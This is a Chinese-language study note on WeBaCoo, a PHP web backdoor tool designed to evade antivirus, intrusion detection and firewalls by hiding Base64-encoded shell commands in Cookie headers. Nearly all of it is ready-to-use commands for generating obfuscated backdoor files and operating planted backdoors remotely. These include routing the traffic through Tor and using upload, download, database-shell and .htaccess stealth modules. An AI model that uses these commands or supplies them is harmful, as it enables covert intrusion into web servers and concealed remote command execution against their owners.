PHP WeBaCoo後門學習筆記
WeBaCoo (Web Backdoor Cookie) 是一款隱蔽的指令碼類Web後門工具。設計理念是躲避AV、NIDS、IPS、網路防火牆和應用防火牆的查殺,提供混淆和原始兩種後門程式碼(原始程式碼較難檢測)。WebBaCoo 使用HTTP響應頭傳送命令執行的結果,Shell命令經過Base64編碼後隱藏在Cookie頭中。
安裝:
官網:http://sbechtsoudis.com/archiive/webacoo/index.html
kali linux下預設位於:/usr/bin 目錄下
使用git安裝:git clone git://github.com/anestisb/WeBaCoo.git
常見使用方法:
生成模式(後門生成):
1、使用預設配置生成模糊後門程式碼:
webacoo -g -o backdoor.php #backdoor.php為自定義後門檔名
2、使用exec有效載荷生成混淆後門程式碼:
webacoo -g -o backdoor.php -f 3 #backdoor.php為自定義後門檔名 3表示exec方法
3、使用popen有效載荷生成原始後門程式碼:
webacoo -g -o backdoor.php -f 5 -r #backdoor為自定義後門檔名 5表示popen方法
終端模式(後門利用):
1、使用預設配置訪問伺服器:
webacoo -t -u http://xxx/backdoor.php #-u 後門路徑
2、使用“Cookie-name”作為Cookie名稱、“TtT”作為分隔符訪問伺服器:
webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" #Cookie-name 與 TtT 為自定義內容
3、使用一般代理:
webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p XX.XX.XX.XX:XXXX #Cookie-name 與 TtT 為自定義內容 XX替換為相應的ip和埠號
4,使用tor代理:
webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p tor #Cookie-name 與 TtT 為自定義內容
引數解釋:
-f FUNCTION :使用PHP系統函式 system、shell_exec、exec、passthru、popen ,按順序FUNCTION分別為數字1、2、3、4、5
-g:生成後門
-o:指定生成的後門檔名
-u URL:後門路徑
-e CMD:單獨命令執行模式 需要新增 -t 和 -u引數
-m METHOD:選擇HTTP請求方式,預設為GET
-c COOKIE:Cookie的名字,預設為:M-cookie
-d DELIM:指定分隔符 預設為隨機
-p PROXY:使用代理
-v LEVEL:列印的詳細程度。預設0 無附加資訊,1列印HTTP頭,2列印HTTP頭和資料
-h:顯示幫助檔案並退出
-update:更新
mysql-cli:MySQL命令列模式
psql-cli:Postgres命令列模式
upload 使用POST上傳檔案
download:下載檔案
stealth:通過.htaccess 處理增加的隱形模組